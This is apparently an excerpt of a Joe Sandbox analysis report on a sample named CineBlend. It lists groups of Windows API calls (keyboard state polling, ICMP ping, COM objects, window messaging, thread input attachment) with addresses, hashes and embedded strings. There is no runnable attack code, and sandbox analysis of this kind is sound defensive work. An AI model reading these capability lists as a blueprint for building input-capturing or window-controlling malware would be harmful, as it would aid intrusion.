                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                          • String ID:
                                          • API String ID: 429561992-0
                                          • Opcode ID: 403fdf2def10b0bf2420ec5e5becd418d1a54bdeeaf9849db026fd8bc57145df
                                          • Instruction ID: 2709720c6aa288205160f32fab975a836a4d55237d63179e1db0b778e89d3fb8
                                          • Opcode Fuzzy Hash: 403fdf2def10b0bf2420ec5e5becd418d1a54bdeeaf9849db026fd8bc57145df
                                          • Instruction Fuzzy Hash: 76C11371608201AFD700DF68C894E2BB7E9FF89748F10499DF98A9B250DB71EE45CB52
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00BB8538
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BB85D4
                                          • SHGetDesktopFolder.SHELL32(?), ref: 00BB85E8
                                          • CoCreateInstance.OLE32(00BE0CD4,00000000,00000001,00C07E8C,?), ref: 00BB8634
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BB86B9
                                          • CoTaskMemFree.OLE32(?,?), ref: 00BB8711
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00BB879C
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BB87BF
                                          • CoTaskMemFree.OLE32(00000000), ref: 00BB87C6
                                          • CoTaskMemFree.OLE32(00000000), ref: 00BB881B
                                          • CoUninitialize.OLE32 ref: 00BB8821
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                          • String ID:
                                          • API String ID: 2762341140-0
                                          • Opcode ID: adb6400a642150f50ba97a6af27ebcea5aabc3dab788aadc8308e1a0777f60a9
                                          • Instruction ID: 9a31ed4498b95f3b655723676180e8d04d36885df944fd627f5616d09dd6b0f7
                                          • Opcode Fuzzy Hash: adb6400a642150f50ba97a6af27ebcea5aabc3dab788aadc8308e1a0777f60a9
                                          • Instruction Fuzzy Hash: 06C11B75A00109AFCB14DFA4C884DAEBBF9FF48304B148599E41ADB361DB71EE45CB90
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BD5FA3
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD5FB4
                                          • CharNextW.USER32(00000158), ref: 00BD5FE3
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BD6024
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BD603A
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD604B
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$CharNext
                                          • String ID:
                                          • API String ID: 1350042424-0
                                          • Opcode ID: 2238d511a195fd59d0b2c9491f6a80d8947d8726058129f72bc65c50235f014e
                                          • Instruction ID: 3b74726cf13c62cb1ed5b0b2cf0a3272449479527e380f23b53fba0b7b024dbe
                                          • Opcode Fuzzy Hash: 2238d511a195fd59d0b2c9491f6a80d8947d8726058129f72bc65c50235f014e
                                          • Instruction Fuzzy Hash: A8617F35901209ABDF219F58CC84EFEBBF8EB09720F108187F965AB391E7749945DB60
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BA039F
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00BA03F8
                                          • VariantInit.OLEAUT32(?), ref: 00BA040A
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BA042A
                                          • VariantCopy.OLEAUT32(?,?), ref: 00BA047D
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BA0491
                                          • VariantClear.OLEAUT32(?), ref: 00BA04A6
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00BA04B3
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA04BC
                                          • VariantClear.OLEAUT32(?), ref: 00BA04CE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA04D9
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: 300574854e2b40b0f1fcbfff0757ed9376b837a043dcde2c8c173e23d3544015
                                          • Instruction ID: 1538b9bb056dd44c05c87cc09a0e4e936838fa71f9848fbff63b051c72768f7e
                                          • Opcode Fuzzy Hash: 300574854e2b40b0f1fcbfff0757ed9376b837a043dcde2c8c173e23d3544015
                                          • Instruction Fuzzy Hash: 82417131A042199FDF00EF64D8549ADBBF9FF09344F0080A5E955A7361DB70A945CF90
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00BAA65D
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00BAA6DE
                                          • GetKeyState.USER32(000000A0), ref: 00BAA6F9
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00BAA713
                                          • GetKeyState.USER32(000000A1), ref: 00BAA728
                                          • GetAsyncKeyState.USER32(00000011), ref: 00BAA740
                                          • GetKeyState.USER32(00000011), ref: 00BAA752
                                          • GetAsyncKeyState.USER32(00000012), ref: 00BAA76A
                                          • GetKeyState.USER32(00000012), ref: 00BAA77C
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00BAA794
                                          • GetKeyState.USER32(0000005B), ref: 00BAA7A6
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: fb11a4a2bd2d50e2ec5d17c22df0f678c7adaa85a24c306a53259b635ab334fd
                                          • Instruction ID: c655f7184c5929b9244379789d7289ae36a0c76ae151ed94732447e4c811fa85
                                          • Opcode Fuzzy Hash: fb11a4a2bd2d50e2ec5d17c22df0f678c7adaa85a24c306a53259b635ab334fd
                                          • Instruction Fuzzy Hash: 8F4192645497C969FF31966488543A6BEF0EB23344F0880DAD5C65A1C2EBA49DC8CBB3
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00BC1019
                                          • inet_addr.WSOCK32(?), ref: 00BC1079
                                          • gethostbyname.WSOCK32(?), ref: 00BC1085
                                          • IcmpCreateFile.IPHLPAPI ref: 00BC1093
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC1123
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC1142
                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00BC1216
                                          • WSACleanup.WSOCK32 ref: 00BC121C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: cb5b27ac68eca9728da8a07e97a4fd1068667db66cddf57d4105b36238af77d1
                                          • Instruction ID: cd836f996d2c44b631360590333e9806f34ddf56281aec1de8687fcf04fb9411
                                          • Opcode Fuzzy Hash: cb5b27ac68eca9728da8a07e97a4fd1068667db66cddf57d4105b36238af77d1
                                          • Instruction Fuzzy Hash: C4919F316042419FD720DF19C888F16BBE4EF46318F1889EDF5A9AB6A2C735ED45CB81
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharLower
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 707087890-567219261
                                          • Opcode ID: c24ff515294eafdaa270df491c667768ae20b74238696ab41bb414a2a9cb8599
                                          • Instruction ID: e64c378f38a3da4f0b5fdf4b979ec7105e44b345f1f5a9bd28fb659c203d4985
                                          • Opcode Fuzzy Hash: c24ff515294eafdaa270df491c667768ae20b74238696ab41bb414a2a9cb8599
                                          • Instruction Fuzzy Hash: AD51C031A015169BEB14DF68C984EBEB3E5FF25360B2042ADF866E7284DB31DE40C790
                                          APIs
                                          • CoInitialize.OLE32 ref: 00BC41D1
                                          • CoUninitialize.OLE32 ref: 00BC41DC
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00BE0B44,?), ref: 00BC4236
                                          • IIDFromString.OLE32(?,?), ref: 00BC42A9
                                          • VariantInit.OLEAUT32(?), ref: 00BC4341
                                          • VariantClear.OLEAUT32(?), ref: 00BC4393
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 636576611-1287834457
                                          • Opcode ID: c510bb5f3f9ea888031bb07bbaecfd01588ef8f88b8f682f6dd71ebf65dd956a
                                          • Instruction ID: 7f9f1eefe6517b843ee512e074d7ca45db038a298bf74afbe7408025eee19a4f
                                          • Opcode Fuzzy Hash: c510bb5f3f9ea888031bb07bbaecfd01588ef8f88b8f682f6dd71ebf65dd956a
                                          • Instruction Fuzzy Hash: 5761B071608701AFC310DF64D899F6ABBE4EF89714F00499DF9819B291DB70EE48CB92
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 00BB8C9C
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB8CAC
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB8CB8
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB8D55
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8D69
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8D9B
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB8DD1
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8DDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local$System
                                          • String ID: *.*
                                          • API String ID: 1464919966-438819550
                                          • Opcode ID: 227b58f93c12e2daa3ed0991ba37d0077070b9f6cdf2caedfd7abf0b953241e9
                                          • Instruction ID: 19ddc62be12444e934397813d6da48b9477af8dc4705c03ddaf4783186f58539
                                          • Opcode Fuzzy Hash: 227b58f93c12e2daa3ed0991ba37d0077070b9f6cdf2caedfd7abf0b953241e9
                                          • Instruction Fuzzy Hash: 40615BB2504305AFCB10EF60C8459AEB7ECFF89310F0449AEF99987251DB71EA45CB92
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00BB3E14
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00BB3E35
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LoadString$_wcslen
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 4099089115-3080491070
                                          • Opcode ID: 8df1f4c4094110e730fbf6c6675d53b33a97a50b6cc61b749032477d98e63ded
                                          • Instruction ID: 17bf01ef5ec046eeb24aad1f79d7920c8c99607c919dc15db3d0b21b0bbd672b
                                          • Opcode Fuzzy Hash: 8df1f4c4094110e730fbf6c6675d53b33a97a50b6cc61b749032477d98e63ded
                                          • Instruction Fuzzy Hash: 0C515B71D0020AAACB15EBA0DD46EEEB7F8EF14700F1041E5B505720A2EB716F59EB61
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00BB5DE5
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BB5E5B
                                          • GetLastError.KERNEL32 ref: 00BB5E65
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00BB5EEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: eb3a0ac1fdfffdc073d8fec35d62ac27c9a027f20a35784ddd88d2e41c992358
                                          • Instruction ID: ff742ffd84b8120d877f0dde433466b9e394a22cbd452b8819e304e22330b9f4
                                          • Opcode Fuzzy Hash: eb3a0ac1fdfffdc073d8fec35d62ac27c9a027f20a35784ddd88d2e41c992358
                                          • Instruction Fuzzy Hash: 4D317E75A00604DFCB20DF68C498BBABBF4EF45304F1480A5E405DB296D7B1EE42CB92
                                          APIs
                                          • CreateMenu.USER32 ref: 00BD4715
                                          • SetMenu.USER32(?,00000000), ref: 00BD4724
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD47AC
                                          • IsMenu.USER32(?), ref: 00BD47C0
                                          • CreatePopupMenu.USER32 ref: 00BD47CA
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD47F7
                                          • DrawMenuBar.USER32 ref: 00BD47FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                          • String ID: 0$F
                                          • API String ID: 161812096-3044882817
                                          • Opcode ID: 3557a840cc889e1ad20b6ee5d403478a0fa42ad431cb11f7739dd8c67bb0be10
                                          • Instruction ID: 6744e43e557cd99b79311bdc06e8e5cf5443c71a5d9ec8135d370e5aa0c4da43
                                          • Opcode Fuzzy Hash: 3557a840cc889e1ad20b6ee5d403478a0fa42ad431cb11f7739dd8c67bb0be10
                                          • Instruction Fuzzy Hash: 46416979A02209EFDB14CF64E894FAABBF5FF09314F14406AFA4597350E771A910DB50
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00BA28B1
                                          • GetDlgCtrlID.USER32 ref: 00BA28BC
                                          • GetParent.USER32 ref: 00BA28D8
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA28DB
                                          • GetDlgCtrlID.USER32(?), ref: 00BA28E4
                                          • GetParent.USER32(?), ref: 00BA28F8
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA28FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 711023334-1403004172
                                          • Opcode ID: a3e6830f2f5e31f24f9c8b4029f01b0f887e81019e1f03a8aa272ca304a3ff79
                                          • Instruction ID: bd55e96ac3a6f58c56232bc90469e4081bc751381172bc615ea4392542f4f357
                                          • Opcode Fuzzy Hash: a3e6830f2f5e31f24f9c8b4029f01b0f887e81019e1f03a8aa272ca304a3ff79
                                          • Instruction Fuzzy Hash: 9821B074E00118BBCF04AFA4CC95DEEBBB4EF06310F0001A6B991A72D1DB758918DB60
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00BA2990
                                          • GetDlgCtrlID.USER32 ref: 00BA299B
                                          • GetParent.USER32 ref: 00BA29B7
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA29BA
                                          • GetDlgCtrlID.USER32(?), ref: 00BA29C3
                                          • GetParent.USER32(?), ref: 00BA29D7
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA29DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 711023334-1403004172
                                          • Opcode ID: 97b150bc37d0b3df055694111dbbf1f5d4d0d576e6af8934dc848aaad3ca372c
                                          • Instruction ID: 7fd0fab3a94f68137a7bb42896159e646af87bf12f2242e3d7d76ccc0fc0723f
                                          • Opcode Fuzzy Hash: 97b150bc37d0b3df055694111dbbf1f5d4d0d576e6af8934dc848aaad3ca372c
                                          • Instruction Fuzzy Hash: C221A175E00218BBCF05AFA4DC85EEEBBF8EF15700F0040A6B991A7191DB758919DB60
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BD4539
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BD453C
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD4563
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BD4586
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BD45FE
                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00BD4648
                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00BD4663
                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00BD467E
                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00BD4692
                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00BD46AF
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow
                                          • String ID:
                                          • API String ID: 312131281-0
                                          • Opcode ID: 3a067ede2ce27d145a07f4ea078cfe640438672566d13f8958d6fa0fd438fb2e
                                          • Instruction ID: 8996ee82afa87d420eba4cbc391266fc7188d74d3aefcde487f228302410cd42
                                          • Opcode Fuzzy Hash: 3a067ede2ce27d145a07f4ea078cfe640438672566d13f8958d6fa0fd438fb2e
                                          • Instruction Fuzzy Hash: 5C614A75A00208AFDB10DFA8CC81FEEB7F8EB0A710F10419AFA15A73A1D774A955DB50
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00BABB18
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB2C
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00BABB33
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB42
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BABB54
                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB6D
